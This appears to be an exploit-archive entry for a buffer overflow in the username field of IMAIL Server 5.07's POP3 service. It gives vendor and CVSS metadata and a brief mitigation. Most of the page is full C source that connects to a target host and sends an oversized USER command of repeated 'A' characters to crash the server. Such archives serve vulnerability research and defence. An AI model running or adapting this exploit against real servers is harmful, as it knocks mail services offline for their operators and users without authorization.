IMAIL 5.07 POP3 Overflow

vendor:

IMAIL Server

by:

Mike@eEye.com

7.5

CVSS

HIGH

Buffer Overflow

120

CWE

Product Name: IMAIL Server

Affected Version From: 05.07

Affected Version To: 05.07

Patch Exists: YES

Related CWE: N/A

CPE: a:ipswitch:imail_server:5.07

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows, Linux, Mac

2001

There is a buffer overflow in the username field when the username is between 200 and 500 characters. Although it may be possible to execute arbitrary code on the vulnerable server, current exploits only cause a denial of service on the remote machine.

Mitigation:

Ensure that the username field is not more than 200 characters.

Source

Exploit-DB raw data:

/*
source: https://www.securityfocus.com/bid/789/info

There is a buffer overflow in the username field when the username is between 200 and 500 characters. Although it may be possible to execute arbitrary code on the vulnerable server, current exploits only cause a denial of service on the remote machine. 

Exploit (by Interrupt):
*/

/*
 * IMAIL 5.07 POP3 Overflow
 * By: Mike@eEye.com
 *
 * Demonstrates vulnerability
 */


 #include <stdio.h>
 #include <string.h>


#ifdef WINDOWS
 #include <windows.h>
 #include <winsock.h>
#else
 #include <sys/types.h>
 #include <sys/socket.h>
 #include <netdb.h>
 #include <netinet/in.h>
#endif


#ifndef WINDOWS
 #define SOCKET_ERROR -1
 #define closesocket(sock) close(sock)
 #define WSACleanup() ;
#endif


char overflow[] =
 "USER AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n";


int main(int argc, char *argv[])
{
#ifdef WINDOWS
   WSADATA wsaData;
#endif


   struct hostent *hp;
   struct sockaddr_in sockin;
   char buf[300], *check;
   int sockfd, bytes;
   char *hostname;
   unsigned short port;


   if (argc <= 1)
   {
      printf("IMAIL POP3 Overflow\n");
      printf("By: Mike@eEye.com\n\n");


      printf("Usage: %s [hostname] [port]\n", argv[0]);
      printf("If port is not specified we use '110'\n");


      exit(0);
   }


   hostname = argv[1];
   if (argv[2]) port = atoi(argv[2]);
   else port = atoi("110");


   printf("IMAIL POP3 Overflow\n");
   printf("By: Mike@eEye.com\n\n");


#ifdef WINDOWS
   if (WSAStartup(MAKEWORD(1, 1), &wsaData) < 0)
   {
      fprintf(stderr, "Error setting up with WinSock v1.1\n");
      exit(-1);
   }
#endif


   hp = gethostbyname(hostname);
   if (hp == NULL)
   {
      printf("ERROR: Uknown host %s\n", hostname);
      exit(-1);
   }


   sockin.sin_family = hp->h_addrtype;
   sockin.sin_port = htons(port);
   sockin.sin_addr = *((struct in_addr *)hp->h_addr);


   if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == SOCKET_ERROR)
   {
      printf("ERROR: Socket Error\n");
      exit(-1);
   }


   if ((connect(sockfd, (struct sockaddr *) &sockin,
                sizeof(sockin))) == SOCKET_ERROR)
   {
      printf("ERROR: Connect Error\n");
      closesocket(sockfd);
      WSACleanup();
      exit(-1);
   }


   printf("Connected to [%s] on port [%d], sending overflow....\n",
          hostname, port);


   /* Check to see if we get a +OK error code. If so then proceed. */
   if ((bytes = recv(sockfd, buf, 300, 0)) == SOCKET_ERROR)
   {
      printf("ERROR: Recv Error\n");
      closesocket(sockfd);
      WSACleanup();
      exit(1);
   }


   buf[bytes] = '\0';
   check = strstr(buf, "+OK");
   if (check == NULL)
   {
      printf("ERROR: NO +OK response from inital connect\n");
      closesocket(sockfd);
      WSACleanup();
      exit(-1);
   }


   if (send(sockfd, overflow, strlen(overflow),0) == SOCKET_ERROR)
   {
      printf("ERROR: Send Error\n");
      closesocket(sockfd);
      WSACleanup();
      exit(-1);
   }


   printf("Sent.\n");


   closesocket(sockfd);
   WSACleanup();
}